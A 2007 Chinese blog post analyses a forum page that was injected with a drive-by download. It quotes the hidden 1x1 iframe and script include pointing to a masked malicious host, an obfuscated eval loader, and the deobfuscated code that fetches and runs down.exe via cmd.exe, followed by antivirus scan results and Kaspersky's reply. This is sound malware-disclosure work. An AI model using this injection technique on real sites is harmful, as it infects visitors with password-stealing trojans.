某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

一篇关于某论坛被黑客挂载恶意软件down.exe的分析报告。该恶意软件被多种反病毒引擎检测为不同类型的威胁,包括Trojan.PWS.Maran.262等。文章详细记录了恶意软件的传播方式及被感染论坛的技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

endurer 原创
2007-07-28 第2版 补充 Kaspersky 的回复
2007-07-28 第1

打开该论坛中偶常去的版面,瑞星提示有可疑文件下载运行。

用Google搜索,果然Google已经标出来了:
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=

检查网页代码,被加入:
/---
<iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1></iframe>
---/

hxxp://i**.x***in**8.info/wm.htm 包含代码:
/---
<script src=0614.js></script>
---/

hxxp://i**.x***in**8.info/0614.js 内容为:
/---
eval("/146/165/156/143/…(略)…/146/75/61/73/175")
---/

经过2次解密,得到原始代码,功能是下载 down.exe,保存到%windir%下,文件名由自定义函数:
/---
function QK45u3(rm4mf){var m0qNW = window[“Math”][“random”]()*rm4mf;return Math[“round”](m0qNW)+‘.exe’;}
---/
即***.exe,其中*为数字,接着通过cmd.exe /c 来运行。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-28 15:2:29
修改时间 : 2007-7-28 15:2:29
访问时间 : 2007-7-28 15:3:29
大小 : 19602 字节 19.146 KB
MD5 : a329a121353d80b9871119788f7b14c7

nSPack 1.3 -> North Star/Liu Xing Ping

文件 down.exe 接收于 2007.07.28 09:14:12 (CET)
当前状态: 完成
反病毒引擎版本最后更新扫描结果
AhnLab-V32007.7.28.02007.07.27Win-Trojan/Hupigon.Gen
AntiVir7.4.0.502007.07.27TR/Agent.19602
Authentium4.93.82007.07.27Possibly a new variant of W32/Threat-HLLIN-Slipper-based!Maximus
Avast4.7.997.02007.07.27Win32:Small-AMI
AVG7.5.0.4762007.07.27Downloader.Generic5.ECA
BitDefender7.22007.07.28GenPack:Generic.Malware.WBdld.92022134
CAT-QuickHeal9.002007.07.26(Suspicious) - DNAScan
ClamAV0.912007.07.28-
DrWeb4.332007.07.27Trojan.PWS.Maran.262
eSafe7.0.15.02007.07.24suspicious Trojan/Worm
eTrust-Vet31.1.50102007.07.28-
Ewido4.02007.07.27-
FileAdvisor12007.07.28-
Fortinet2.91.0.02007.07.28-
F-Prot4.3.2.482007.07.27W32/Threat-HLLIN-Slipper-based!Maximus
F-Secure6.70.13030.02007.07.27W32/Hupigon.gen67
IkarusT3.1.1.82007.07.27Backdoor.Win32.Agent.ahj
Kaspersky4.0.2.242007.07.28-
McAfee50852007.07.27-
Microsoft1.27042007.07.28-
NOD32v224262007.07.27a variant of Win32/TrojanDownloader.Delf.NSA
Norman5.80.022007.07.27W32/Hupigon.gen67
Panda9.0.0.42007.07.28Generic Trojan
Rising19.33.42.002007.07.27-
Prevx1V22007.07.28W32.MALWARE.GEN
Sophos4.19.02007.07.26Mal/Packer
Sunbelt2.2.907.02007.07.28VIPRE.Suspicious
Symantec102007.07.28-
TheHacker6.1.7.1552007.07.28-
VBA323.12.2.12007.07.27MalwareScope.Trojan-PSW.Game.14
VirusBuster4.3.26:92007.07.27-
Webwasher-Gateway6.0.12007.07.28Trojan.Agent.19602

附加信息

File size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

SHA1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=CBB0E79992C2FA964C9000F9F5065B00EFB6D5A7

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

主 题:RE:[KLAB-2516758]
发件人:"" <newvirus@kaspersky.com> <script language="JavaScript" type="text/javascript"> <!-- var aAddAdress = document.getElementById("aAddAdress"); aAddAdress.href = document.guideform.guidelinks.options[5].value; var aDeleteAdress = document.getElementById("aDeleteAdress"); aDeleteAdress.href = document.guideform.guidelinks.options[4].value; document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]); document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]); //--> </script>发送时间:2007-07-28 16:16:38
Hello.

Virus.Win32.AutoRun.z

New malicious software was found in the attached file.

It's detection will be included in the next update. Thank you for your help.

-----------------

Regards, Yury Nesmachny

Virus Analyst, Kaspersky Lab.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值